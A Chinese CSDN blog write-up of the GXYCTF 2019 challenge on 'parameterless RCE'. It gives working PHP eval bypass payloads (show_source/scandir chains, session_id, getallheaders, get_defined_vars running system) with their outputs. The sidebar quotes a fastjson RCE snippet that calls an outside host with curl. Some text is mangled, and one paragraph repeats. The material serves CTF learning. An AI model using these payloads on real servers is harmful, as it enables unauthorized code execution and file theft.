关于无参数RCE的一些奇技淫巧

最新推荐文章于 2024-05-31 16:22:19 发布
最新推荐文章于 2024-05-31 16:22:19 发布
阅读量619 收藏 15
点赞数 16
文章标签: 学习 笔记 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66013948/article/details/137438436
版权

简述:

​ 首先说一下什么是无参数RCE,对于很多时候,我们通常遇到PHP中存在eval函数的时候,一般是通过构造:

system("cat /flag");

​ 的payload来实行攻击的,大不了就出现了一些waf需要绕过。但是,有的时候,他们相关的waf特别奇葩,像是过滤了所有的字母以及数字什么的,另外,就是这篇博客最主要说明的题目,就是无参数RCE:

​ 像是下面的这一个正则:

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star'])) {    
    eval($_GET['star']);
}

​ 经过了它的过滤之后,最后只有a(b(c())); 这样的payload才不会被过滤了。

正则表达式 [^\W]+((?R)?) 匹配了一个或多个非标点符号字符(表示函数名),后跟一个括号(表示函数调用)。其中 (?R) 是递归引用,它只能匹配和替换嵌套的函数调用,而不能处理函数参数。使用该正则表达式进行替换后,每个函数调用都会被删除,只剩下一个分号 ;,而最终结果强等于;时,payload才能进行下一步。简而言之,无参数rce就是不使用参数,而只使用一个个函数最终达到目的。

相关函数讲解:

  • scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)
  • localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)
  • current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西
  • getcwd() :取得当前工作目录
  • dirname():函数返回路径中的目录部分
  • array_flip() :交换数组中的键和值,成功时返回交换后的数组
  • array_rand() :从数组中随机取出一个或多个单元
  • array_reverse():将数组内容反转
  • strrev():用于反转给定字符串
  • getcwd():获取当前工作目录路径
  • dirname() :函数返回路径中的目录部分。
  • chdir() :函数改变当前的目录。
  • eval()、assert():命令执行
  • hightlight_file()、show_source()、readfile():读取文件内容

​ 数组移动操作:

  • end() : 将内部指针指向数组中的最后一个元素,并输出
  • next() :将内部指针指向数组中的下一个元素,并输出
  • prev() :将内部指针指向数组中的上一个元素,并输出
  • reset() : 将内部指针指向数组中的第一个元素,并输出
  • each() : 返回当前元素的键名和键值,并将内部指针向前移动

题目示例:[GXYCTF 2019]禁止套娃

​ 先说题目,首先是一个信息搜集,不过这个信息搜集通过多次尝试或者扫后台发现了.git/文件夹,猜测是git泄露,直接Githack下源码,得到index.php的内容:

D:\c\python tools\GitHack>python GitHack.py http://node4.anna.nssctf.cn:28131/.git
[+] Download and parse index file ...
[+] flag.php
[+] index.php
[OK] flag.php
[OK] index.php

​ 之后得到Index.php源码如下:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

​ 这里只需要关心第二层绕过,主要考点应该是这一层,也就是无参数RCE。

1.常规方法:

​ 通常情况下, 我们想要读取该目录的文件内容,那么,常规的方法就是如下,不过,先给一个payload:

?exp=show_source(next(array_reverse(scandir(current(localeconv())))));

​ 首先,通过通过localeconv() 来 ,返回一包含本地数字及货币格式信息的数组,又因为数组的第一项是 '.,因此可以通过current() (返回数组中的单元,默认取第一个值)来获取数组中的第一个参数也就是那一个点:

//payload  			?exp=var_dump(localeconv());

//output:
array(18) { ["decimal_point"]=> string(1) "." ["thousands_sep"]=> string(0) "" ["int_curr_symbol"]=> string(0) "" ["currency_symbol"]=> string(0) "" ["mon_decimal_point"]=> string(0) "" ["mon_thousands_sep"]=> string(0) "" ["positive_sign"]=> string(0) "" ["negative_sign"]=> string(0) "" ["int_frac_digits"]=> int(127) ["frac_digits"]=> int(127) ["p_cs_precedes"]=> int(127) ["p_sep_by_space"]=> int(127) ["n_cs_precedes"]=> int(127) ["n_sep_by_space"]=> int(127) ["p_sign_posn"]=> int(127) ["n_sign_posn"]=> int(127) ["grouping"]=> array(0) { } ["mon_grouping"]=> array(0) { } }

//payload = 		?exp=var_dump(current(localeconv()));

//output  
string(1) "."

​ 之后,通过scandir() 返回当前目录中的所有文件和目录的列表:

//paylaod			?exp=var_dump(scandir(current(localeconv())));

//output:
array(5) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(4) ".git" [3]=> string(8) "flag.php" [4]=> string(9) "index.php" }

​ 刚好,这个题目稍微凑巧了,flag文件刚好在倒数第二个文件中,因此可以使用array_reverse()来反转这个数组:

//paylaod			?exp=var_dump(array_reverse(scandir(current(localeconv()))));

//output:
array(5) { [0]=> string(9) "index.php" [1]=> string(8) "flag.php" [2]=> string(4) ".git" [3]=> string(2) ".." [4]=> string(1) "." }

​ 之后,通过next()来操作指针,指向flag文件:

//paylaod			?exp=var_dump(next(array_reverse(scandir(current(localeconv())))));

//output:
string(8) "flag.php"

​ 之后就可以通过highlight_file()来读取flag文件的内容了

//paylaod			?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

//output:
<?php
$flag = 'NSSCTF{fe7192e9-edcb-4217-9bcf-220940f8c20d}';

2.session_id()

​ 使用条件:当请求头中有cookie时(或者走投无路手动添加cookie头也行,有些CTF题不会卡)

​ 首先我们需要开启session_start()来保证session_id()的使用,session_id可以用来获取当前会话ID,也就是说它可以抓取PHPSESSID后面的东西,但是phpsession不允许()出现
​ 在burp中,构造一个payload为:

?exp=readfile(session_id(session_start()));

​ 随后,将Cookie 改为:

PHPSESSID=flag.php

​ 最后成功读取到了flag 文件

3.getallheaders()

​ getallheaders()返回当前请求的所有请求头信息,局限于Apache(apache_request_headers()和getallheaders()功能相似,可互相替代,不过也是局限于Apache)

​ 当确定能够返回时,我们就能在数据包最后一行加上一个请求头,写入恶意代码,再用end()函数指向最后一个请求头,使其执行,payload:

?exp=var_dump(end(getallheaders()));

​ 不过,这个题目我用这个方法的时候失败了,因为第三层绕过过滤了et,然后get单词存在被过滤单词,无法绕过,所以用一下别人的图片:

在这里插入图片描述

4.get_defined_vars()

​ 相较于getallheaders()更加具有普遍性,它可以回显全局变量 G E T 、 _GET、 GET_POST、 F I L E S 、 _FILES、 FILES_COOKIE,

返回数组顺序为 G E T − − > _GET--> GET>_POST–> C O O K I E − − > _COOKIE--> COOKIE>_FILES

​ 由于题目中过滤了

​ 首先确认是否有回显:

print_r(get_defined_vars());

​ 假如说原本只有一个参数a,那么可以多加一个参数b,后面写入恶意语句,payload:

a=eval(end(current(get_defined_vars())));&b=system('ls /');

​ 把eval换成assert也行 ,能执行system(‘ls /’)就行

5.chdir()

​ 实在无法rce,可以考虑目录遍历进行文件读取,不过这里由于题目的过滤有点恶心人,所以只好记录一下方法了,有了机会再进行实践。

​ 利用getcwd()获取当前目录:

var_dump(getcwd());

​ 结合dirname()列出当前工作目录的父目录中的所有文件和目录:.

var_dump(scandir(dirname(getcwd())));

​ 读上一级文件名:

?code=show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));

?code=show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));

?code=show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));

​ 读根目录:

​ ord() 函数和 chr() 函数:只能对第一个字符进行转码,ord() 编码,chr)解码,有概率会解码出斜杠读取根目录

?code=print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));

​ 要用chdir()固定,payload:

?code=show_source(array_rand(array_flip(scandir(dirname(chdir(chr(ord(strrev(crypt(serialize(array() )))))))))));

6.array_rand()#赌狗必备法:

​ 首先,在这里吐槽一句,赌狗不值得同情[doge]

​ 可以通过array_rand()函数随机获取数组中的键,因此,需要提前将数组键值对翻转以下,让后再使用如下payload进行赌。

?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));

​ 因为这种很考验运气,因此,当目录中文件过多的情况下只有赌一把运气,可能一两下就出了,可能要花很长时间,因此,还是那句话,赌狗不值得同情[doge]。

参考资料:

​ 可以通过array_rand()函数随机获取数组中的键,因此,需要提前将数组键值对翻转以下,让后再使用如下payload进行赌。

?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));

​ 因为这种很考验运气,因此,当目录中文件过多的情况下只有赌一把运气,可能一两下就出了,可能要花很长时间,因此,还是那句话,赌狗不值得同情[doge]。

参考资料:

https://blog.csdn.net/2301_76690905/article/details/133808536?ops_request_misc=&request_id=&biz_id=102&utm_term=%E6%97%A0%E5%8F%82%E6%95%B0RCE&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-3-133808536.142v100pc_search_result_base3&spm=1018.2226.3001.4187

晓幂
关注
  • 16
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpstudy_rce.py
10-11
phpstudy_rce
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
PHP LFI 利用临时文件 Getshell 姿势
qq_45521281的博客
06-02 2664
文章目录前言PHP LFI临时文件全局变量存储目录命名规则Windows Temporary FilePHPINFO特性测试代码漏洞分析漏洞利用php7 Segment Fault利用条件漏洞分析代码环境漏洞利用 前言 最近整理PHP文件包含漏洞姿势的时候,发现一些比较好用的姿势关于本地文件包含漏洞可以利用临时文件包含恶意代码拿到Webshell的一些奇技淫巧,于是打算详细整理一下。 PHP LFI PHP LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件,例如session文件、日志文件、临时文
红队专题-漏洞挖掘代码审计-RCE-SSRF
aming小老弟
11-30 1217
可以进行批量存活扫描和目录扫描 ------>在好几个站下面发现web.zip备份文件。可以看到,传入进来的密码是RSA类型,先进行了一次RSA解密,然后进行了一次DES加密。经过之前的审计,发现了很多接口都存在漏洞,现在成功登录了。岂不是随便getshell。但是登录过程中,密码是RSA加密过后传输的,而后端居然是33位的md5加密。密码传入后,调用了CommFun.EnPwd进行了一次加密。某方法接收了两个参数,却只对一个参数进行了过滤。该方法需要提供绝对路径----->跟踪相关参数
参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
CTFHUB WEB
m0_62566376的博客
07-17 742
ctfhub web笔记
【虚空】【ISCTF2023】ISCTF2023 Web方向全题目wp
qq_42557115的博客
11-30 1281
ISCTF2023 Web方向全wp
通达OA漏洞比getshell还要牛的system权限
hackzkaq的博客
04-20 2078
更多黑客技能 公众号:白帽子左一 作者:掌控安全-master 一位向往于任意门的白帽少年,我的奇技淫巧,让你尽可能的getshell. 今天的主角通达OA,前段时间黑产界的杀手,开始吧! 0x00 漏洞简介 CNVD:CNVD-2020-26562 通达OA是由北京通达信科科技有限公司开发的一款办公系统,前几天通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。 攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻
看我如何在赛门铁克邮件安全网关上实现弱口令到RCE漏洞执行
bylfsj的博客
11-01 2489
看我如何在赛门铁克邮件安全网关上实现弱口令到RCE漏洞执行 ...
【Web】CTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 1977
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
强化学习——学习笔记3
qq_52302919的博客
05-29 1286
先上图:在上述流程图中所说的Q表即为下表:假设我们在玩一个小游戏,该游戏有上下左右不同的动作,同时也会有不同的状态,比如游戏结束等。Q表也可以称为状态-价值函数QsaQ(s,a)Qsa:这个表格的每一行代表每个 state上述例子中的游戏结束等,每一列代表每个 action上述例子中的上下左右,表格的数值就是在各个 state 下采取各个 action 时能够获得的最大的未来期望奖励。
学习整理 docker
wonder_dog的博客
05-31 103
nexus。
书籍学习|基于SprinBoot+vue的书籍学习平台(源码+数据库+文档)
JIngJaneIL的博客
05-28 1083
首先,论文一开始便是清楚的论述了平台的研究内容。其次,剖析平台需求分析,弄明白“做什么”,分析包括业务分析和业务流程的分析以及用例分析,更进一步明确平台的需求。然后在明白了平台的需求基础上需要进一步地设计平台,主要包罗软件架构模式、整体功能模块、数据库设计。本项目软件架构选择B/S模式和java技术,总体功能模块运用自顶向下的分层思想。再然后就是实现平台并进行代码编写实现功能。论文的最后章节总结一下自己完成本论文和开发本项目的心得和总结。通过书籍学习平台将会使书籍学习各个方面的工作效率带来实质性的提升。
前端技术入门学习:探索数字世界的奇幻之旅
qwertyhn_0024的博客
05-27 210
HTML定义了网页的结构和内容,CSS负责样式和布局,而JavaScript则实现了网页的交互功能。对于初学者来说,前端技术既是一个充满魅力的新世界,也是一个充满挑战与困惑的领域。本文将引导您从四个方面、五个方面、六个方面和七个方面深入理解前端技术,开启您的学习之旅。在这个过程中,我们需要不断探索、学习和实践,才能逐步掌握这门技艺的精髓。同时,我们也需要保持敏锐的洞察力和开放的心态,不断适应和应对前端技术领域的变化和发展。同时,随着人工智能、大数据等新技术的不断涌现,前端技术也将面临更多的挑战和机遇。
oracle中的INTERVAL函数学习总结
weixin_42821740的博客
05-30 350
简单学懂interval函数
超大功率光伏并网逆变器学习(三相)
最新发布
我的博客
05-31 202
1.超大功率用的IGBT开关频率通常很低,比如6KHz。2.线电压和相电压的关系。
fastjson rce
09-16
Fastjson RCE(Remote Code Execution)是指在使用Fastjson这个Java库时,存在远程代码执行的风险。在Fastjson版本1.2.24及以下的版本中,存在RCE问题。这个问题是由于Fastjson引入了AutoType特性,但在安全方面的考虑不够周全,导致攻击者可以通过构造恶意的JSON数据来执行任意的Java代码,从而实现远程代码执行。 为了利用Fastjson RCE问题,攻击者可以使用一些工具,比如fastjson_tool.jar。通过执行类似以下命令来利用Fastjson RCE问题: ``` java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ``` 以上命令中,HRMIServer和HLDAPServer是Fastjson工具提供的两种利用方式,它们可以远程执行指定的代码,包括通过curl命令发送HTTP请求。 值得注意的是,Fastjson RCE问题只存在于版本1.2.24及以下,因此建议使用最新版本的Fastjson以避免此安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值